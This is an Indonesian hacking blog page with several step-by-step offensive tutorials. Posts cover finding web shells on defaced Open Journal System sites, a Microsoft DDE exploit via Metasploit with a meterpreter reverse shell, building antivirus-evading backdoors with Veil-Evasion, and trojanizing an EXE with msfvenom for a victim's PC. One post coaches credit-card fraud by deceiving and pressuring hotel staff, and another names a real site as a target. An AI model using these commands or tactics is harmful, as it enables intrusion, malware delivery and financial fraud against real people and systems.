News Ticker

Latest Posts

Cara Mencari Akses Shell Di CMS Open Journal System

- Tuesday, November 21, 2017 No Comments

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke SINI (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.

Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

- 3 Comments


Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

Langkah-langkah

  • -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
  • -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/
  • -         Jalankan Metasploit
  • -         Jalankan perintah 

use exploits/windows/dde_delivery

  • -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

  • -         Jalankan exploit
  • -         Copy script yang muncul pada module dan buka VirtualMachine kalian
  • -         Buka Microsoft Word
  • -         Klik tab Insert > Quick Parts > Fields > Ok


  •  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

  • -         Ganti dengan script yang kita dapat dari module


  • -         Save !
  • -         Buka file doc yang telah kita simpan tadi.
  • -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar


  • -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!


Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.


Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.



Cc fisik dihotel

- Sunday, October 29, 2017 3 Comments

 Tips tentang hotel yang di mintain cc fisik? Oke saya disini mau berbagi Tips untuk anda


Oke.. Sekarang tukang ekse hotel pada ribut tentang dihotel yang dimintain cc fisik!!!
Lanjut saja dengan Tips nya....

Awal mula kalian ditanyakan cc fisik sama pelayan hotel anda jangan panik guys!!! Karna kepanikan bisa bikin pelayan hotel nambah curiga... Kalian Berbicara santai seperti sediakala!! Oke kita lanjut tahap-tahap nya :)

  1. Kamu bilang kepelayan hotel ketika ditanyakan cc fisik, kalo anda di pay kan oleh paman diluar negri(Sesuai country cc)
  2. Dan ketika ditanyakan kontak paman anda jawab tidak punya, hanya nomor telepon yang dimiliki, dan ketika ditanyain anda kasih nomor telepon fake dengan code sesuai country(Sebelum masuk hotel anda harus mengsiap kan nomor fake) lalu anda bilang ke pelayan hotel kalo paman susah dihubungi kadang bisa dihubungi malam hari karena Waktu beraktivitas berbeda... INGAT!!! Hp yang dipake untuk nomor fake harus dimatikan karna biasa nya dicoba telfon
  3. Ketika sudah berbincang-bincang dengan pelayan hotel karna nomor nya tidak aktif, anda tanyakan "Ini sudah bisa check in belum?" ketika pelayan bingung anda kasih tau "Wahh kalo gini saya bisa dilapor kan karna pelayanan kaya gini, sudah jelas-jelas pay online didengan bank luar negri" (Sambil ngancem dikit hehe) Kalo pelayan hotel jawab karena takut kriminal hack cc, anda jawab lagi "Coba aja malem mba telfon, saya cape mau istirahat"
  4. Jika anda malem hari ditanyakan kenapa tidak aktif? Anda jawab "kan sudah bilang susah dihubungi, malem juga jarang.. Btw bukan nya udah payment sukses full? Kok malah gini? Kalo udah sukses terus ga ada masalah dengan bank sama dengan kan bukan dapet HACK CC"

Ini Tips tidak tau sukses semua hotel atau tidak:v karna saya kemaren dikarawang sukses 100% jika gagal coba muka nya dipas kan dlu dikaca lemari anda :)


Oke sekian tips dari saya guys :) kalo tidak jelas maaf kan saya hehe..  Jika anda bingung silahkan tulis dikomentar atau Chat Fb Ded Ftu 

Cara Menemukan File Backdoor Di Suatu WEB

- Friday, September 22, 2017 6 Comments
lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di SINI Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Mencari Halaman Login Admin

- Thursday, September 21, 2017 No Comments
Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

- Sunday, August 20, 2017 3 Comments

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Menyisipkan Backdoor ke File EXE

- Thursday, August 17, 2017 1 Comment
Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
  4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  5. atau command di bawah ini (untuk 64 bit atau x64)
  6. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  7. Isi LHOST dengan IP agan masing"
  8. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  9. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  10. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  11. Ingat LHOST dan LPORT isi punya agan sendiri :D
  12. Nah lalu pindah tuh ke PC korban :D
  13. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  14. Selamat Mengeksploitasi PC korban :v